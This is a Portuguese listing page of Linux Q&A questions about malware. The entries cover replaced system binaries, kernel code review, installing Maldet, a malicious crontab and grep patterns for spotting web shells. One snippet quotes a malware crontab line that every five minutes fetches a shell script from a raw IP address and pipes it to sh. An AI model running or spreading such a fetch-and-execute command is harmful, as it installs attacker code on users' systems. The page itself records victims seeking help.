Perguntas sobre malware. Página # 104

1

resposta

Não é possível copiar o executável do comando top original por um malicioso

Alguém invadiu meu sistema e substituiu alguns dos comandos do sistema, como top, ps, find etc, por outros maliciosos. Agora, estou tentando copiar os originais, mas os comandos de cópia ou movimentação falharão, mesmo que eu esteja logado co...

02.07.2013 / 01:20

1

resposta

Como o código-fonte é revisado / auditado, antes da inclusão na linha principal do Linux?

Uma resposta a esta pergunta forneceria insights e referências sobre como o código-fonte do kernel do Linux é revisado antes de ser lançado? Particular aspecto interessante desta pergunta para mim é: Quem e quantas pessoas revisam o códig...

05.10.2018 / 16:46

1

resposta

cd falha ao tentar entrar no diretório danetect version-agnostic

Estou instalando o Maldet no Debian 9.3: cd /usr/local/src wget http://www.rfxn.com/downloads/maldetect-current.tar.gz tar -xzvf maldetect-current.tar.gz cd maldetect-* bash ./install.sh Ao fazer cd maldetect-* , recebi: Bash: Too...

08.01.2018 / 13:32

1

resposta

Por que meus arquivos de usuário crontab são imutáveis e não são executados mesmo depois de alterar o atributo para mutável?

Em um meio de suprimir um malware que criou uma entrada crontab abaixo, o II apresentou o uso do cron.deny */5 * * * * curl -fsSL http://62.109.20.220:38438/start.sh|sh No entanto, todos os crontabs do usuário de repente pararam de aciona...

18.06.2017 / 10:01

1

resposta

Pesquisa e substituição de múltiplas linhas globais

Eu tenho um servidor com milhares de arquivos contendo um padrão de várias linhas que eu quero encontrar globalmente & substituir. Aqui está uma amostra do padrão: <div class="fusion-header-sticky-height"></div> <div cla...

13.11.2016 / 05:41

2

respostas

Este é um argumento de que a segurança do Linux não é impenetrável?

Pelo que entendi, a maior e provavelmente a única linha de defesa contra software não autorizado (vírus e worms) que está sendo instalada no sistema é simplesmente não permitir, a menos que uma senha de administrador tenha sido fornecida. Mas...

09.03.2015 / 14:04

1

resposta

Explique a função de localização de malware no bash

Acabei de ver as linhas do arquivo .bash_history abaixo: grep -iHlnr 'filesman' *2> /dev/null grep -iHlnr 'eval.*base64_decode' *2> /dev/null Do Google, sei que é algo como "comando de detecção de malware". Alguém pode explicar o...

03.09.2016 / 12:41

1

resposta

O vírus VBS Jenxcus afeta o sistema operacional Linux? [fechadas]

Recentemente eu conectei ao meu Linux um pendrive infectado com o VBS Jenxcus. Isso afetou meu sistema operacional?

22.03.2016 / 09:56

1

resposta

Hospedagem no Apache / 2.2.22, scan diz desatualizado

Eu sou sites de hospedagem na web no Apache / 2.2.22 e fiz uma varredura de segurança. A varredura disse que o software do servidor está desatualizado; o provedor de hospedagem na web diz que não está desatualizado e é estável. Alguém fez upload...

02.12.2014 / 07:45

1

resposta

Gnome-pty-helper como um vírus? [fechadas]

Eu perguntei a esta pergunta e aceitei a resposta, Onde gnome-pty-helper foi identificado como a compromise of some sort . Este é o link para o arquivo binário. Como posso descobrir o que foi acessado no sistema de arquivos por e...

29.07.2017 / 16:17

Perguntas sobre 'malware'